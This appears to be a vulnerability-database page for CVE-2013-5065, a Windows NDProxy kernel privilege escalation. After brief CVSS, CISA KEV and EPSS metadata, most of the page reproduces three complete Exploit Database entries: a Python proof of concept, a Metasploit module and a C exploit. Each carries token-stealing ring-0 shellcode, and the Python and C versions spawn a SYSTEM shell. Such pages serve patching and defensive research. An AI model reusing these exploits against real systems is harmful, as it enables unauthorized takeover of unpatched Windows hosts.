Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-20 |
Improper Input Validation The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.2 |
|
AV:L/AC:L/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
CISA KEV (Known Exploited Vulnerabilities)
Vulnerability name : Microsoft Windows Kernel Privilege Escalation Vulnerability
Required action : Apply updates per vendor instructions.
Known To Be Used in Ransomware Campaigns : Unknown
Added : 2022-03-02 23:00 +00:00
Action is due : 2022-03-23 23:00 +00:00
Important informations
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 30014
Publication date : 2013-12-02 23:00 +00:00
Author : ryujin
EDB Verified : Yes
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = 2097151
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
baseadd = c_int(0x00000001)
MEMRES = (0x1000 | 0x2000)
MEM_DECOMMIT = 0x4000
PAGEEXE = 0x00000040
null_size = c_int(0x1000)
STATUS_SUCCESS = 0
def log(msg):
print msg
def getLastError():
"""[-] Format GetLastError"""
buf = create_string_buffer(2048)
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0,
buf, sizeof(buf), NULL):
log(buf.value)
else:
log("[-] Unknown Error")
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"
tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
InBuf = c_char_p(tmp)
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
if dwStatus != STATUS_SUCCESS:
print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
getLastError()
written = c_ulong()
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
if alloc == 0:
print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
getLastError()
dwRetBytes = DWORD(0)
DEVICE_NAME = "\\\\.\\NDProxy"
hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
if hdev == -1:
print "[-] Couldn't open the device... :("
sys.exit()
kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
kernel32.CloseHandle(hdev)
print "[+] Spawning SYSTEM Shell..."
os.system("start /d \"C:\\windows\\system32\" cmd.exe")
Exploit Database EDB-ID : 30392
Publication date : 2013-12-16 23:00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'Microsoft Windows ndproxy.sys Local Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
to access an array unsafely, and the value is used to perform a call, leading to a NULL
pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
work the service "Routing and Remote Access" must be running on the target system.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery
'ryujin', # python PoC
'Shahin Ramezany', # C PoC
'juan vazquez' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Windows XP SP3',
{
'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
'_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
'_TOKEN' => "\xc8", # Offset to TOKEN from the _EPROCESS struct
'_UPID' => "\x84", # Offset to UniqueProcessId FROM the _EPROCESS struct
'_APLINKS' => "\x88" # Offset to ActiveProcessLinks _EPROCESS struct
}
],
[ 'Windows Server 2003 SP2',
{
'HaliQuerySystemInfo' => 0x1fa1e,
'_KPROCESS' => "\x38",
'_TOKEN' => "\xd8",
'_UPID' => "\x94",
'_APLINKS' => "\x98"
}
]
],
'References' =>
[
[ 'CVE', '2013-5065' ],
[ 'OSVDB' , '100368'],
[ 'BID', '63971' ],
[ 'EDB', '30014' ],
[ 'URL', 'http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2914486'],
[ 'URL', 'https://github.com/ShahinRamezany/Codes/blob/master/CVE-2013-5065/CVE-2013-5065.cpp' ],
[ 'URL', 'http://www.secniu.com/blog/?p=53' ],
[ 'URL', 'http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html' ],
[ 'URL', 'http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html' ]
],
'DisclosureDate'=> 'Nov 27 2013',
'DefaultTarget' => 0
}))
end
def add_railgun_functions
session.railgun.add_function(
'ntdll',
'NtAllocateVirtualMemory',
'DWORD',
[
["DWORD", "ProcessHandle", "in"],
["PBLOB", "BaseAddress", "inout"],
["PDWORD", "ZeroBits", "in"],
["PBLOB", "RegionSize", "inout"],
["DWORD", "AllocationType", "in"],
["DWORD", "Protect", "in"]
])
session.railgun.add_function(
'ntdll',
'NtDeviceIoControlFile',
'DWORD',
[
[ "DWORD", "FileHandle", "in" ],
[ "DWORD", "Event", "in" ],
[ "DWORD", "ApcRoutine", "in" ],
[ "DWORD", "ApcContext", "in" ],
[ "PDWORD", "IoStatusBlock", "out" ],
[ "DWORD", "IoControlCode", "in" ],
[ "LPVOID", "InputBuffer", "in" ],
[ "DWORD", "InputBufferLength", "in" ],
[ "LPVOID", "OutputBuffer", "in" ],
[ "DWORD", "OutPutBufferLength", "in" ]
])
session.railgun.add_function(
'ntdll',
'NtQueryIntervalProfile',
'DWORD',
[
[ "DWORD", "ProfileSource", "in" ],
[ "PDWORD", "Interval", "out" ]
])
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function(
'psapi',
'EnumDeviceDrivers',
'BOOL',
[
["PBLOB", "lpImageBase", "out"],
["DWORD", "cb", "in"],
["PDWORD", "lpcbNeeded", "out"]
])
session.railgun.add_function(
'psapi',
'GetDeviceDriverBaseNameA',
'DWORD',
[
["LPVOID", "ImageBase", "in"],
["PBLOB", "lpBaseName", "out"],
["DWORD", "nSize", "in"]
])
end
def open_device(dev)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(dev, 0x0, 0x0, nil, 0x3, 0, 0)
handle = r['return']
if handle == invalid_handle_value
return nil
end
return handle
end
def find_sys_base(drvname)
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0..results['return'] - 1]
if drvname == nil
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
end
elsif drvname == results['lpBaseName'][0..results['return'] - 1]
return [address, current_drvname]
end
end
return nil
end
def ring0_shellcode(t)
restore_ptrs = "\x31\xc0" # xor eax, eax
restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack("L") # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack("L") # mov dword ptr [nt!HalDispatchTable+0x4], eax
tokenstealing = "\x52" # push edx # Save edx on the stack
tokenstealing << "\x53" # push ebx # Save ebx on the stack
tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0
tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
tokenstealing << "\x8b\x40" + t['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS
tokenstealing << "\x8b\xc8" # mov ecx, eax
tokenstealing << "\x8b\x98" + t['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN
tokenstealing << "\x8b\x80" + t['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
tokenstealing << "\x81\xe8" + t['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
tokenstealing << "\x81\xb8" + t['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
tokenstealing << "\x75\xe8" # jne 0000101e ======================
tokenstealing << "\x8b\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
tokenstealing << "\x89\x90" + t['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
tokenstealing << "\x5b" # pop ebx # Restores ebx
tokenstealing << "\x5a" # pop edx # Restores edx
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
ring0_shellcode = restore_ptrs + tokenstealing
return ring0_shellcode
end
def fill_memory(proc, address, length, content)
result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
unless proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
end
vprint_good("#{address} is now writable")
result = proc.memory.write(address, content)
if result.nil?
vprint_error("Failed to write contents to memory")
return nil
else
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
end
return address
end
def create_proc
windir = expand_path("%windir%")
cmd = "#{windir}\\System32\\notepad.exe"
# run hidden
begin
proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
rescue Rex::Post::Meterpreter::RequestError
# when running from the Adobe Reader sandbox:
# Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
return nil
end
return proc.pid
end
def disclose_addresses(t)
addresses = {}
vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base(nil)
if kernel_info.nil?
vprint_error("Failed to disclose the Kernel module name")
return nil
end
vprint_good("Kernel module found: #{kernel_info[1]}")
vprint_status("Getting a Kernel handle...")
kernel32_handle = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
kernel32_handle = kernel32_handle['return']
if kernel32_handle == 0
vprint_error("Failed to get a Kernel handle")
return nil
end
vprint_good("Kernel handle acquired")
vprint_status("Disclosing the HalDispatchTable...")
hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
hal_dispatch_table = hal_dispatch_table['return']
if hal_dispatch_table == 0
vprint_error("Failed to disclose the HalDispatchTable")
return nil
end
hal_dispatch_table -= kernel32_handle
hal_dispatch_table += kernel_info[0]
addresses["halDispatchTable"] = hal_dispatch_table
vprint_good("HalDispatchTable found at 0x#{addresses["halDispatchTable"].to_s(16)}")
vprint_status("Getting the hal.dll Base Address...")
hal_info = find_sys_base("hal.dll")
if hal_info.nil?
vprint_error("Failed to disclose hal.dll Base Address")
return nil
end
hal_base = hal_info[0]
vprint_good("hal.dll Base Address disclosed at 0x#{hal_base.to_s(16)}")
hali_query_system_information = hal_base + t['HaliQuerySystemInfo']
addresses["HaliQuerySystemInfo"] = hali_query_system_information
vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
return addresses
end
def check
vprint_status("Adding the railgun stuff...")
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Detected
end
handle = open_device("\\\\.\\NDProxy")
if handle.nil?
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
os = sysinfo["OS"]
case os
when /windows xp.*service pack 3/i
return Exploit::CheckCode::Appears
when /[2003|.net server].*service pack 2/i
return Exploit::CheckCode::Appears
when /windows xp/i
return Exploit::CheckCode::Detected
when /[2003|.net server]/i
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
vprint_status("Adding the railgun stuff...")
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
my_target = nil
if target.name =~ /Automatic/
print_status("Detecting the target system...")
os = sysinfo["OS"]
if os =~ /windows xp.*service pack 3/i
my_target = targets[1]
print_status("Running against #{my_target.name}")
elsif ((os =~ /2003/) and (os =~ /service pack 2/i))
my_target = targets[2]
print_status("Running against #{my_target.name}")
elsif ((os =~ /\.net server/i) and (os =~ /service pack 2/i))
my_target = targets[2]
print_status("Running against #{my_target.name}")
end
else
my_target = target
end
if my_target.nil?
fail_with(Failure::NoTarget, "Remote system not detected as target, select the target manually")
end
print_status("Checking device...")
handle = open_device("\\\\.\\NDProxy")
if handle.nil?
fail_with(Failure::NoTarget, "\\\\.\\NDProxy device not found")
else
print_good("\\\\.\\NDProxy found!")
end
print_status("Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...")
@addresses = disclose_addresses(my_target)
if @addresses.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Filed to disclose necessary addresses for exploitation. Aborting.")
else
print_good("Addresses successfully disclosed.")
end
print_status("Storing the kernel stager on memory...")
this_proc = session.sys.process.open
kernel_shell = ring0_shellcode(my_target)
kernel_shell_address = 0x1000
result = fill_memory(this_proc, kernel_shell_address, kernel_shell.length, kernel_shell)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
else
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
end
print_status("Storing the trampoline to the kernel stager on memory...")
trampoline = "\x90" * 0x38 # nops
trampoline << "\x68" # push opcode
trampoline << [0x1000].pack("V") # address to push
trampoline << "\xc3" # ret
trampoline_addr = 0x1
result = fill_memory(this_proc, trampoline_addr, trampoline.length, trampoline)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing trampoline on memory")
else
print_good("Trampoline successfully stored at 0x#{trampoline_addr.to_s(16)}")
end
print_status("Storing the IO Control buffer on memory...")
buffer = "\x00" * 1024
buffer[20, 4] = [0x7030125].pack("V") # In order to trigger the vulnerable call
buffer[28, 4] = [0x34].pack("V") # In order to trigger the vulnerable call
buffer_addr = 0x0d0d0000
result = fill_memory(this_proc, buffer_addr, buffer.length, buffer)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the IO Control buffer on memory")
else
print_good("IO Control buffer successfully stored at 0x#{buffer_addr.to_s(16)}")
end
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
magic_ioctl = 0x8fff23c8
# Values taken from the exploit in the wild, see references
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, magic_ioctl, buffer_addr, buffer.length, buffer_addr, 0x80)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
print_status("Checking privileges after exploitation...")
unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
end
p = payload.encoded
print_good("Exploitation successful! Creating a new process and launching payload...")
new_pid = create_proc
if new_pid.nil?
print_warning("Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...")
return
end
print_status("Injecting #{p.length.to_s} bytes into #{new_pid} memory and executing it...")
if execute_shellcode(p, nil, new_pid)
print_good("Enjoy")
else
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end
Exploit Database EDB-ID : 37732
Publication date : 2015-08-06 22:00 +00:00
Author : Tomislav Paskalev
EDB Verified : No
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include
#include
#include
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
Products Mentioned
Configuraton 0
Microsoft>>Windows_2003_server >> Version *
Microsoft>>Windows_xp >> Version *
Microsoft>>Windows_xp >> Version *
References